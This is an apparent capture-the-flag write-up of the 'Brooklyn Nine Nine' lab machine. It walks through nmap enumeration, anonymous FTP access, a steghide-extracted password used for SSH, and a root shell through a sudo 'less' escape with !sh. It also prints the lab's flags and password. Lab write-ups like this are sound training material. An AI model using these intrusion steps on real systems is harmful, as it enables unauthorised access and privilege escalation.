---
Brooklyn Nine Nine is an Easy Linux machine themed around the TV show. Anonymous FTP access leaks a note that hints at steganography — a password is hidden inside the website's background image using steghide. That password gives SSH access as one user. Privilege escalation comes from a sudo misconfiguration on less, which allows a root shell in a single command.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV $TARGET_IP
Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-22 14:15 UTC
Nmap scan report for $TARGET_IP
Host is up (0.032s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:$ATTACKER_IP
| Logged in as ftp
|_ TYPE: ASCII
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:ee:0e:ad:15:e9:bc:ad:c9:7c:73:f0:92 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 9.84 seconds
Three services: FTP on port 21 with anonymous login enabled (Nmap already confirms this and shows a file), SSH on 22, and a web server on 80. Anonymous FTP is the immediate entry point — Nmap reports ftp-anon: Anonymous FTP login allowed and shows a file named note_to_jake.txt already sitting in the root.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ ftp $TARGET_IP
Connected to $TARGET_IP.
220 (vsFTPd 3.0.3)
Name ($TARGET_IP:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||22936|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
229 Entering Extended Passive Mode (|||46530|)
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
119 1.79 KiB/s
226 Transfer complete.
ftp> bye
221 Goodbye.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ cat note_to_jake.txt
From Amy,
Jake please change your password. It is too weak and
I will not be able to protect you. Also stop using
the same password in your backup files.
Amy
The note reveals a username (jake) and hints that his password is weak — making it bruteforceable. It also mentions "backup files," which is a hint toward steganography or hidden credentials elsewhere. The website is the next place to check.
The website's background image is a JPEG of the Brooklyn Nine Nine cast. Steghide is a tool that hides data inside image files using a passphrase. Trying an empty passphrase first:
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ wget http://$TARGET_IP/brooklyn99.jpg
--2026-08-22 14:18:41-- http://$TARGET_IP/brooklyn99.jpg
Connecting to $TARGET_IP:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 69685 (68K) [image/jpeg]
Saving to: 'brooklyn99.jpg'
brooklyn99.jpg 100%[===================>] 68.05K --.-KB/s in 0.1s
2026-08-22 14:18:41 (592 KB/s) - 'brooklyn99.jpg' saved [69685/69685]
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ steghide extract -sf brooklyn99.jpg
Enter passphrase:
wrote extracted data to "note.txt".
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ cat note.txt
Holts Password:
fluffydog12@ninenine
Enjoy!!
The image contained a hidden file extractable with an empty passphrase. It contains the SSH password for holt, not jake. The note from Amy mentioned Jake's password being weak — either credential leads to the machine. Holt's password is ready to use directly.
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ ssh holt@$TARGET_IP
The authenticity of host '$TARGET_IP' can't be established.
ECDSA key fingerprint is SHA256:Ofz3K2vgHJJHjWZ4nIH7OqDN5G0yEJDh0EvLSBxbKA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '$TARGET_IP' (ECDSA) to the list of known hosts.
holt@$TARGET_IP's password: fluffydog12@ninenine
Last login: Tue May 26 08:59:00 2020
holt@brookly_nine_nine:~$ id
uid=1000(holt) gid=1000(holt) groups=1000(holt)
holt@brookly_nine_nine:~$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee
holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User holt may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
less is a file pager — it reads files and allows scrolling through them. When run as root via sudo, it also accepts shell commands through its built-in command mode. Entering !sh inside less spawns a shell that inherits root privileges from the sudo invocation. This is documented on GTFOBins.
holt@brookly_nine_nine:~$ sudo less /etc/passwd
Inside the less pager, type !sh and press Enter:
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
63a9f0ea7bb98050796b649e85481845
ftp-anon script reports whether anonymous FTP login is allowed and lists the directory contents. This eliminates a separate enumeration step.steghide extract -sf <image>. Always try an empty passphrase first — it works more often than expected.sudo -l is always the first privilege escalation check. Any binary in GTFOBins with sudo permission leads to a root shell. less spawns a shell with !sh from within the pager.